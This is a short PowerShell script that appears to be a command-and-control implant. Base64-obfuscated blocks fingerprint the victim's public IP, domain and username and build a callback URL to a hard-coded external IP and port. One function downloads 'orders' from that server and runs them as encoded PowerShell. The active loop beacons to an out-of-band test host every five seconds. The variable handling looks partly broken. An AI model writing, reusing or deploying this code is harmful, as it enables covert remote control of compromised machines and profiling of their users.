$init = "JABjAGEAdABlAHIAZQByAF8AaQBwACAAPQAgACIAOQAxAC4AMgAxADkALgAyADEANQAuADIAMgA4ACIADQAKACQAYwBhAHQAZQByAGUAcgBfAHAAbwByAHQAIAA9ACAANQA0ADkAMQA3AA0ACgAkAHYAaQBzAGkAdABvAHIAXwBpAHAAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AaQBmAGMAbwBuAGYAaQBnAC4AbQBlAC8AaQBwACcAKQANAAoAJAB2AGkAcwBpAHQAbwByAF8AZABvAG0AYQBpAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUADQAKACQAdgBpAHMAaQB0AG8AcgBfAHUAcwBlAHIAbgBhAG0AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFUAcwBlAHIATgBhAG0AZQANAAoAJAB1AHYAaQBkACAAPQAgACIASQBQADoAIgArACQAdgBpAHMAaQB0AG8AcgBfAGkAcAArACIALABEAG8AbQBhAGkAbgA6ACIAKwAkAHYAaQBzAGkAdABvAHIAXwBkAG8AbQBhAGkAbgArACIALABVAHMAZQByAE4AYQBtAGUAOgAiACsAJAB2AGkAcwBpAHQAbwByAF8AdQBzAGUAcgBuAGEAbQBlAA0ACgAkAHUAdgBpAGQAXwBiADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAF0AOgA6AG4AZQB3ACgAWwBiAHkAdABlAFsAXQBdAFsAYwBoAGEAcgBbAF0AXQAkAHUAdgBpAGQAKQANAAoAJAB1AHYAaQBkAF8AcwBoAGEAMgA1ADYAIAA9ACAARwBlAHQALQBGAGkAbABlAEgAYQBzAGgAIAAtAEkAbgBwAHUAdABTAHQAcgBlAGEAbQAgACQAdQB2AGkAZABfAGIAMgAgAC0AQQBsAGcAbwByAGkAdABoAG0AIABTAEgAQQAyADUANgAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABIAGEAcwBoAA0ACgAkAGIAYwA9ACIAaAB0AHQAcAA6AC8ALwAiACsAJABjAGEAdABlAHIAZQByAF8AaQBwACsAIgA6ACIAKwAkAGMAYQB0AGUAcgBlAHIAXwBwAG8AcgB0ACsAIgAvAGMAbQA/AHUAdgBpAGQAPQAiACsAJAB1AHYAaQBkAF8AcwBoAGEAMgA1ADYA"
$request_order = "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGIAYwApAA=="
function Drop-Sails{
    powershell -encodedcommand $init
}

function Request-Orders {    
    $order_raw = powershell -encodedcommand $request_order | Select-Object -ExpandProperty Content
    $order_b = [System.Text.Encoding]::Unicode.GetBytes($order_raw)
    $order_b64 = [Convert]::ToBase64String($order_b)
    return $order_b64
}

function Run-Orders { 
    $orders = Request-Orders
    powershell -encodedcommand $orders
}
function Orders-Test {
    $url = "ckfgqpy2vtc00009pjk0gjzam5oyyyyyb.oast.fun"
    powershell -Command "Invoke-WebRequest -Uri $url"
}
Drop-Sails

while(1){
    Orders-Test
    Sleep 5;
}

#while(True){
#    Run-Orders
#    sleep 600    
#}
